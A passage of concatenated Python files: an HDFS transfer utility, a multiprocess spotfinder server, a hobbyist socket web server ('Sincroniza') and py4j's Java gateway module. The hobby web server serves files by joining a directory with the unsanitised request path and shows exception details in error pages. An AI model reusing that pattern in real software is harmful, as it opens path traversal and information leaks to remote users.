t = os.path.join(dirname, i)
rlist.append(t)
return rlist
assert isinstance(client, HDFSClient)
all_files = get_local_files(local_path)
if not all_files:
_logger.info("there are nothing need to upload, exit")
return
_logger.info("Start {} multi process to upload datas".format(
multi_processes))
procs = []
for i in range(multi_processes):
process_datas = all_files[i::multi_processes]
p = multiprocessing.Process(
target=__subprocess_upload, args=(process_datas, ))
procs.append(p)
p.start()
# complete the processes
for proc in procs:
proc.join()
_logger.info("Finish {} multi process to upload datas".format(
multi_processes))
if __name__ == "__main__":
hadoop_home = "/home/client/hadoop-client/hadoop/"
configs = {
"fs.default.name": "hdfs://xxx.hadoop.com:54310",
"hadoop.job.ugi": "hello,hello123"
}
client = HDFSClient(hadoop_home, configs)
client.ls("/user/com/train-25")
files = client.lsr("/user/com/train-25/models")
downloads = multi_download(
client,
"/user/com/train-25/model",
"/home/xx/data1",
1,
5,
100,
multi_processes=5)
multi_upload(client, "/user/com/train-25/model", "/home/xx/data1")
|
mp_spotfinder_server_read_file.py
|
from __future__ import absolute_import, division, print_function
from BaseHTTPServer import HTTPServer
import cgi, sys
from multiprocessing import Process, current_process
from urlparse import urlparse
from six.moves import range
#backward compatibility with Python 2.5
try: from urlparse import parse_qs
except Exception: from cgi import parse_qs
def note(format, *args):
sys.stderr.write('[%s]\t%s\n' % (current_process().name, format%args))
from spotfinder.servers.spotfinder_server_read_file import image_request_handler as irhbase
from spotfinder.servers.spotfinder_server_read_file import generate_common_parameters # import dependency
class image_request_handler(irhbase):
def log_message(self, format, *args):
note(format, *args)
def serve_forever(server):
note('starting server')
try:
server.serve_forever()
except KeyboardInterrupt:
pass
def runpool(address, number_of_processes,handler):
# create a single server object -- children will each inherit a copy
server = HTTPServer(address, handler)
# create child processes to act as workers
for i in range(number_of_processes-1):
Process(target=serve_forever, args=(server,)).start()
# main process also acts as a worker
serve_forever(server)
|
web_server.py
|
# Sincroniza Web App - Por João Lucas | Desenvolvido como requisito para a Mostra Cientifica
import socket
import threading
from utils import *
from urllib.parse import unquote
from python_parser import pythonfier
content_dir = "web/"
class WebServer(object):
def __init__(self, port):
self.port = port
self.host = socket.gethostbyname(socket.gethostname())
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def _headers(self, status, cookie=""):
preset = f"\nServer: Sincroniza\nConnection: close\n\n"
if cookie != "":
preset = f"\nServer: Sincroniza\nConnection: close\n{cookie}\n\n"
if status == 200:
header = "HTTP/1.1 200 Response OK" + preset
elif status == 401:
header = "HTTP/1.1 400 Not Authorized." + preset
elif status == 403:
header = "HTTP/1.1 403 Permissions Required." + preset
elif status == 404:
header = "HTTP/1.1 404 Not Found." + preset
else:
header = "HTTP/1.1 500 Server Could Not Process the Request." + preset
return header
def _request_handler(self, type, body, addr):
cookies = ""
vars = {"cookies": {}, "url_params": {}, "ip": addr}
for line in body.split("\n"):
if line.startswith("Cookie:"):
cook = line[8:].split("; ")
for cokizinho in cook:
for cokizinho in cook:
if cokizinho.endswith("\r"):
vars["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1][:-1]})
else:
vars["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1]})
file = body.split(" ")[1].split("?")[0]
try:
for param in body.split(" ")[1].split("?")[1].split("&"):
vars["url_params"].update({param.split("=")[0]: param.split("=")[1]})
except:
pass
file = content_dir + file
if type in ["GET", "HEAD"]:
if file == content_dir + "/": file = content_dir + "index.html"
try:
file_contents = htmlfy(open(file, "rb").read())
if file.endswith(".html"): cookies, file_contents = pythonfier(file_contents.decode(), vars)
return self._headers(200, cookies).encode() + file_contents
except FileNotFoundError:
return self._headers(
404).encode() + b"<html><head><title>UC | 404</title></head><body><center><h1>Erro 404</h1></center></body></html>"
except OSError:
return self._headers(403).encode() + htmlfy(
f"<html><head><title>UC | 403</title></head><body><center><h1>Erro 403</h1><br><p>Esta página é restrita.</p></center></body></html>").encode()
except Exception as e:
return self._headers(500).encode() + htmlfy(
f"<html><head><title>UC | 500</title></head><body><center><h1>Erro 500</h1><br><p>Um erro occoreu no servidor. detalhes:<br>{e}</p></center></body></html>").encode()
elif type == "POST":
values = {"cookies": {}, "ip": addr}
for line in body.split("\n"):
if line.startswith("Cookie:"):
cook = line[8:].split("; ")
for cokizinho in cook:
if cokizinho.endswith("\r"):
values["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1][:-1]})
else:
values["cookies"].update({cokizinho.split("=")[0]: cokizinho.split("=")[1]})
try:
for value in unquote(body.split("\n")[-1]).split("&"):
values.update({value.split("=")[0]: value.split("=")[1]})
except Exception as e:
print(e)
if file == content_dir + "/": file = content_dir + "index.html"
try:
file_contents = htmlfy(open(file, "rb").read())
if file.endswith(".html"): cookies, file_contents = pythonfier(file_contents.decode("utf-8"), values)
return self._headers(200, cookies).encode() + file_contents
except FileNotFoundError:
return self._headers(
404).encode() + b"<html><head><title>UC | 404</title></head><body><center><h1>Erro 404</h1></center></body></html>"
except OSError:
return self._headers(403).encode() + htmlfy(
f"<html><head><title>UC | 403</title></head><body><center><h1>Erro 403</h1><br><p>Esta página é restrita.</p></center></body></html>".encode()).encode()
except Exception as e:
return self._headers(500).encode() + htmlfy(
f"<html><head><title>UC | 500</title></head><body><center><h1>Erro 500</h1><br><p>Um erro occoreu no servidor. detalhes:<br>{e}</p></center></body></html>".encode()).encode()
return self._headers(200).encode() + body.encode()
def _handler(self, client, addr):
while True:
data = client.recv(1000024)
if not data: break
try:
data = data.decode('utf-8')
except Exception as e:
print("[WEB] Unknown")
client.close()
break
method = data.split(" ")[0]
response = self._request_handler(method, data, addr[0])
client.send(response)
client.close()
break
def start(self):
try:
print(f"[WEB] Binding to {self.host}:{self.port}")
self.socket.bind((self.host, self.port))
print("[WEB] Binded.")
except Exception as e:
self.socket.close()
print(f"[WEB] Failed to bind. {e}")
exit()
self._listener()
def _listener(self):
self.socket.listen(5)
while True:
(client, addr) = self.socket.accept()
client.settimeout(60)
print(f"[WEB] Recieved incoming connection. {addr}")
print("[WEB] Starting Handler Thread")
threading.Thread(target=self._handler, args=(client, addr)).start()
print("[LOG] Hello from Jão!")
while True:
print("[LOG] Starting WEB")
WebServer(80).start()
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java Naming Convention do not recommend to start with an underscore
so clashes become unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = {"yes", "y", "t", "true"}
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
"""Ensures that the child process is created in another process group.
This prevents signals such as SIGINT from propagating to the JVM.
"""
if os.name != "nt":
kwargs = {"preexec_fn": os.setpgrp}
else:
kwargs = {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
return kwargs
def set_reuse_address(server_socket):
"""Sets reuse address option if not on windows.
On windows, the SO_REUSEADDR option means that multiple server sockets can
be bound to the same address (it has nothing to do with TIME_WAIT).
"""
if os.name != "nt":
server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
"""Sets default accept timeout of callback server.
"""
deprecated("set_default_callback_accept_timeout", "1.0",
"CallbackServerParameters")
global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
:import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
maven_jar_file = "py4j-{0}.jar".format(__version__)
paths.append(jar_file)
# ant
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
# maven
paths.append(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../../../py4j-java/target/" + maven_jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
# pip install py4j # On Ubuntu 16.04, where virtualenvepath=/usr/local
# this file is here:
# virtualenvpath/lib/pythonX/dist-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
# pip install --user py4j # On Ubuntu 16.04, where virtualenvepath=~/.local
# this file is here:
# virtualenvpath/lib/pythonX/site-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../../share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True,
java_path="java", create_new_process_group=False,
enable_auth=False, cwd=None, return_proc=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but in
case of errors related to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
Java process will stay alive, which may be a problem for some scenarios
though.
:param enable_auth: If True, the server will require clients to provide an
authentication token when connecting.
:param cwd: If not None, path that will be used as the current working
directory of the Java process.
:param return_proc: If True, returns the Popen object returned when the JVM
process was created.
:rtype: the port number of the `Gateway` server or, when auth enabled,
a 2-tuple with the port number and the auth token.
"""
popen_kwargs = {}
if not jarpath:
jarpath = find_jar_path()
if not java_path:
java_home = os.environ.get("JAVA_HOME")
if java_home:
java_path = os.path.join(java_home, "bin", "java")
else:
java_path = "java"
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = [java_path, "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
if enable_auth:
command.append("--enable-auth")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
close_stderr = False
if redirect_stderr is None:
stderr = open(os.devnull, "w")
close_stderr = True
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
if create_new_process_group:
popen_kwargs.update(get_create_new_process_group_kwargs())
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
cwd=cwd, **popen_kwargs)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Read the auth token from the server if enabled.
_auth_token = None
if enable_auth:
_auth_token = proc.stdout.readline()[:-1]
# Start consumer threads so process does not deadlock/hangs
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
if close_stderr:
# XXX This will quiet ResourceWarning in Python 3.5+
# This only close the fd in this process, not in the JVM process, which
# makes sense.
quiet_close(stderr)
if enable_auth:
output = (_port, _auth_token)
else:
output = _port
if return_proc:
if isinstance(output, tuple):
output = output + (proc, )
else:
output = (_port, proc)
return output
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
instance, or a JavaObject instance)
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def get_java_class(java_class):
"""Returns the java.lang.Class of a JavaClass. This is equivalent to
calling .class in Java.
:param java_class: An instance of JavaClass
:rtype: An instance of JavaObject that corresponds to a java.lang.Class
"""
return java_class._java_lang_class
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
if closable is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
if socket_instance is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
"""Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes the
connection and the remote socket should fail on write and should not need
to read to realize that the socket was closed.
Only use on timeout and maybe shutdown because it does not terminate the
TCP connection normally.
"""
l_onoff = 1
l_linger = 0
a_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack(b'ii', l_onoff, l_linger))
def check_connection(a_socket, read_timeout):
"""Checks that a socket is ready to receive by reading from it.
If the read times out, this is a good sign. If the read returns an
empty string, this usually means that the socket was remotely closed.
:param a_socket: The socket to read from.
:param read_timeout: The read_timeout to restore the socket to.
"""
a_socket.settimeout(0.0001)
response = 0
try:
response = a_socket.recv(2)
except socket.timeout:
# Do nothing this is expected!
pass
finally:
a_socket.settimeout(read_timeout)
if response == b"":
raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
:param gateway_client: The gatway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
def do_client_auth(command, input_stream, sock, auth_token):
"""Receives and decodes a auth token.
- If the token does not match, an exception is raised.
- If the command received is not an Auth command, an exception is raised.
- If an exception occurs, it is wrapped in a Py4JAuthenticationError.
- Otherwise, it returns True.
"""
try:
if command != proto.AUTH_COMMAND_NAME:
raise Py4JAuthenticationError("Expected {}, received {}.".format(
proto.AUTH_COMMAND_NAME, command))
client_token = smart_decode(input_stream.readline()[:-1])
# Remove the END marker
input_stream.readline()
if auth_token == client_token:
success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
sock.sendall(success)
else:
error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
# TODO AUTH Send error message with the error?
sock.sendall(error)
raise Py4JAuthenticationError("Client authentication failed.")
except Py4JAuthenticationError:
raise
except Exception as e:
logger.exception(
"An exception occurred while trying to authenticate "
"a connection")
raise Py4JAuthenticationError(cause=e)
return True
def _garbage_collect_object(gateway_client, target_id):
try:
try:
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
gateway_client.garbage_collect_object(target_id)
except Exception:
logger.debug(
"Exception while garbage collecting an object",
exc_info=True)
except Exception:
# Maybe logger is dead at this point.
pass
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
try:
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
except Exception:
# Maybe logger used by quiet_* is dead at this point
pass
def _garbage_collect_proxy(pool, proxy_id):
"""Removes a proxy from the pool of python proxies.
Do not remove special proxies such as the entry point.
Note: even though this function starts with _garbage_collect,
it is not called withing a weakref lambda. This is only a private function.
"""
success = False
if proxy_id != proto.ENTRY_POINT_OBJECT_ID:
try:
del(pool[proxy_id])
success = True
except KeyError:
logger.warning(
"Tried to garbage collect non existing python proxy {0}"
.format(proxy_id))
return success
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False,
ssl_context=None, enable_memory_management=True,
read_timeout=None, auth_token=None):
"""
:param address: the address to which the client will request a
connection. If you're assing a `SSLContext` with
`check_hostname=True` then this address must match
(one of) the hostname(s) in the certificate the gateway
server presents.
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method
calls less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect
to the JVM, it shuts down itself and raises an exception.
:param ssl_context: if not None, SSL connections will be made using
this SSLContext
:param enable_memory_management: if True, tells the Java side when a
JavaObject (reference to an object on the Java side) is garbage
collected on the Python side.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a response from the Java side.
:param auth_token: if provided, an authentication that token clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
self.ssl_context = ssl_context
self.enable_memory_management = enable_memory_management
self.read_timeout = read_timeout
self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True,
ssl_context=None,
accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
read_timeout=None, propagate_java_exceptions=False,
auth_token=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
Default is 25333.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
:param ssl_context: if not None, the SSLContext's certificate will be
presented to callback connections.
:param accept_timeout: if > 0, sets a timeout in seconds after which
the callbackserver stops waiting for a connection, sees if the
callback server should shut down, and if not, wait again for a
connection. The default is 5 seconds: this roughly means that
if can take up to 5 seconds to shut down the callback server.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a call or command from the
Java side.
:param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
by a Python callback will cause the nested `java_exception` to be
thrown on the Java side. If `False`, the `Py4JJavaError` will
manifest as a `Py4JException` on the Java side, just as with any
other kind of Python exception. Setting this option is useful if
you need to implement a Java interface where the user of the
interface has special handling for specific Java exception types.
:param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
self.ssl_context = ssl_context
if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
# This is to support deprecated function call...
# TODO Remove "DEFAULT" once we remove the deprecated function
# call.
accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
self.accept_timeout = accept_timeout
self.read_timeout = read_timeout
self.propagate_java_exceptions = propagate_java_exceptions
self.auth_token = escape_new_line(auth_token)
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayConnectionGuard(object):
def __init__(self, client, connection):
self._client = client
self._connection = connection
def __enter__(self):
return self
def read(self, hint=-1):
return self._connection.stream.read(hint)
def __exit__(self, type, value, traceback):
if value is None:
self._client._give_back_connection(self._connection)
else:
self._connection.close()
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
auto_close=True, gateway_property=None,
ssl_context=None, gateway_parameters=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
if address != DEFAULT_ADDRESS:
deprecated("GatewayClient.address", "1.0", "GatewayParameters")
if port != DEFAULT_PORT:
deprecated("GatewayClient.port", "1.0", "GatewayParameters")
if not gateway_parameters:
gateway_parameters = GatewayParameters(
address=address, port=port, auto_close=auto_close,
ssl_context=ssl_context)
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
self.is_connected = True
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.ssl_context = gateway_parameters.ssl_context
self.deque = deque()
